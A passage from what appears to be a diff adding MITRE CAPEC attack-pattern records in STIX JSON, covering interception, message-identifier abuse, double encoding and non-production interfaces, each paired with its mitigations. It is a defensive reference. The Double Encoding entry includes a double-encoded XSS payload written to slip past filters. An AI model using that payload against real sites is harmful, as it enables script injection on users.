"attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_prerequisites": [ + "An adversary requires some way of interacting with the system." + ], + "x_capec_resources_required": [ + "A tool, such as an Adversary in the Middle (CAPEC-94) Proxy or a fuzzer, that is capable of generating and injecting custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Minimize error/response output to only what is necessary for functional use or corrective language.", + "id": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-116-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04", + "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remove potentially sensitive information that is not necessary for the application's functionality.", + "id": "course-of-action--f79678b2-0a62-418a-907b-5e73dd03e3bc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-116-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1a976d5b-38ec-4508-8329-3a6a82d44d97", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f79678b2-0a62-418a-907b-5e73dd03e3bc", + "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position themself so as to observe explicit data channels (e.g. network traffic) and read the content. However, this attack differs from a Adversary-In-the-Middle (CAPEC-94) attack, as the adversary does not alter the content of the communications nor forward data to the intended recipient.", + "external_references": [ + { + "external_id": "CAPEC-117", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + } + ], + "id": "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Interception", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Physical Security" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_prerequisites": [ + "The target must transmit data over a medium that is accessible to the adversary." + ], + "x_capec_resources_required": [ + "The adversary must have the necessary technology to intercept information passing between the nodes of a network. For TCP/IP, the capability to run tcpdump, ethereal, etc. can be useful. Depending upon the data being targeted the technological requirements will change." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage encryption to encode the transmission of data thus making it accessible only to authorized parties.", + "id": "course-of-action--2e4a2bce-d5ab-429d-91d4-b26c22f7f02b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-117-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--859073fb-487f-4a31-b50e-4cceb762f731", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e4a2bce-d5ab-429d-91d4-b26c22f7f02b", + "target_ref": "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.", + "external_references": [ + { + "external_id": "CAPEC-12", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/12.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + } + ], + "id": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Choosing Message Identifier", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single \"Partners\" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Adversaries having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner's ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows adversaries without partner status from conducting this attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Nature of Messages: Determine the nature of messages being transported as well as the identifiers to be used as part of the attack

Experiment

  1. Authenticate: If required, authenticate to the distribution channel

  2. Identify Known Client Identifiers: If any particular client's information is available through a control channel available to all users, the adversary will discover particular identifiers for targeted clients by observing this channel, or requesting client information through this channel.

  3. Change Message Identifier: Adversaries with client access connecting to output channels could change their channel identifier and see someone else's (perhaps more privileged) data.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_prerequisites": [ + "Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users.", + "Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves." + ], + "x_capec_resources_required": [ + "The adversary needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means." + ], + "x_capec_skills_required": { + "Low": "All the adversary needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.\n The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message.\n ", + "id": "course-of-action--a9ab8b72-4e44-4c81-bf44-e366ff5503d4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-12-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3057788f-a10c-42ba-86f8-673bdaa92ba0", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a9ab8b72-4e44-4c81-bf44-e366ff5503d4", + "target_ref": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Re-architect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them.", + "id": "course-of-action--dcc7f9fa-ae3e-4b43-ae71-e3c7a72ea187", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-12-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d1d83e8-400f-438d-a941-c0692758395f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dcc7f9fa-ae3e-4b43-ae71-e3c7a72ea187", + "target_ref": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.", + "external_references": [ + { + "external_id": "CAPEC-120", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + } + ], + "id": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Double Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:\n %253Cscript%253Ealert('This is an XSS Attack')%253C%252Fscript%253E\n Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an adversary may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An adversary can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.

    2. Techniques
    Try to use double-encoding to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.", + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_resources_required": [ + "Tools that automate encoding of data can assist the adversary in generating encoded strings." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.", + "id": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44b07350-79d0-449c-b510-54552ac1b8ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.", + "id": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfa73c3f-86a6-476f-aab5-335c5f41f2ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When client input is required from web-based forms, avoid using the \"GET\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \"POST method whenever possible.", + "id": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e482c72-7993-4ddf-8fca-22de8312c642", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.", + "id": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba444e1f-3d84-4501-b9c6-09b06a824f96", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Refer to the RFCs to safely decode URL.", + "id": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11ad9490-5c2d-4430-8ecc-b0740ebc3c54", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.", + "id": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f1b0725-8a4f-49f1-9954-eb67b0182990", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).", + "id": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--be25410a-e03c-4307-88da-60d4e71e7f4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits a sample, demonstration, test, or debug interface that is unintentionally enabled on a production system, with the goal of gleaning information or leveraging functionality that would otherwise be unavailable.\n ", + "external_references": [ + { + "external_id": "CAPEC-121", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/121.html" + }, + { + "external_id": "CWE-489", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/489.html" + }, + { + "external_id": "CWE-1209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1209.html" + }, + { + "external_id": "CWE-1259", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1259.html" + }, + { + "external_id": "CWE-1267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1267.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + "external_id": "CWE-1294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1294.html" + }, + { + "external_id": "CWE-1295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1295.html" + }, + { + "external_id": "CWE-1296", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1296.html" + }, + { + "external_id": "CWE-1302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1302.html" + }, + { + "external_id": "CWE-1313", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1313.html" + }, + { + "description": "Swarup Bhunia, Mark M. Tehranipoor, The Hardware Trojan War: Attacks, Myths, and Defenses, 2017--11---30, Springer", + "external_id": "REF-588", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Boyang Du, Matteo Sonza Reorda, Luca Sterpone, Luis Parra, Marta Portela-Garcia, Almudena Lindoso, Luis Entrena, Exploiting the debug interface to support on-line test of control flow errors, 2013--07---08, Institute of Electrical and Electronics Engineers (IEEE)", + "external_id": "REF-589", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/document/6604058/authors#authors" + } + ], + "id": "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Exploit Non-Production Interfaces", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_consequences": { + "Access_Control": [ + "Modify Data", + "Alter Execution Logic" + ], + "Authentication": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Read Data", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data", + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Modify Data", + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Some software applications include application programming interfaces (APIs) that are intended to allow an administrator to test and refine their domain. These APIs are typically disabled once a system enters a production environment, but may be left in an insecure state due to a configuration error or mismanagement.\n ", + "\n Many hardware systems leverage bits typically reserved for future functionality for testing and debugging purposes. If these reserved bits remain enabled in a production environment, it could allow an adversary to induce unwanted/unsupported behavior in the hardware.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Vulnerable Interface: An adversary explores a target system for sample or test interfaces that have not been disabled by a system administrator and which may be exploitable by the adversary.

    2. Techniques
    If needed, the adversary explores an organization's network to determine if any specific systems of interest exist.

Exploit

  1. Leverage Test Interface to Execute Attacks: Once an adversary has discovered a system with a non-production interface, the interface is leveraged to exploit the system and/or conduct various attacks.

    2. Techniques
    The adversary can leverage the sample or test interface to conduct several types of attacks such as Adversary-in-the-Middle attacks (CAPEC-94), keylogging, Cross Site Scripting (XSS), hardware manipulation attacks, and more.
", + "x_capec_extended_description": "\n Non-production interfaces are insecure by default and should not be resident on production systems, since they may reveal sensitive information or functionality that should not be known to end-users. However, such interfaces may be unintentionally left enabled on a production system due to configuration errors, supply chain mismanagement, or other pre-deployment activities.\n Ultimately, failure to properly disable non-production interfaces, in a production environment, may expose a great deal of diagnostic information or functionality to an adversary, which can be utilized to further refine their attack. Moreover, many non-production interfaces do not have adequate security controls or may not have undergone rigorous testing since they were not intended for use in production environments. As such, they may contain many flaws and vulnerabilities that could allow an adversary to severely disrupt a target.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_prerequisites": [ + "The target must have configured non-production interfaces and failed to secure or remove them when brought into a production environment." + ], + "x_capec_resources_required": [ + "For some interfaces, the adversary will need that appropriate client application or hardware that interfaces with the interface. Other non-production interfaces can be executed using simple tools, such as web browsers or console windows. In some cases, an adversary may need to be able to authenticate to the target before it can access the vulnerable interface." + ], + "x_capec_skills_required": { + "High": "Exploiting non-production interfaces requires significant skill and knowledge about the potential non-production interfaces left enabled in production." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that production systems do not contain non-production interfaces and that these interfaces are only used in development environments.", + "id": "course-of-action--5d87e697-369a-4c96-a265-70c9a99bcc01", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-121-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9337f1a1-389b-4fca-8da7-80a10dc44926", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 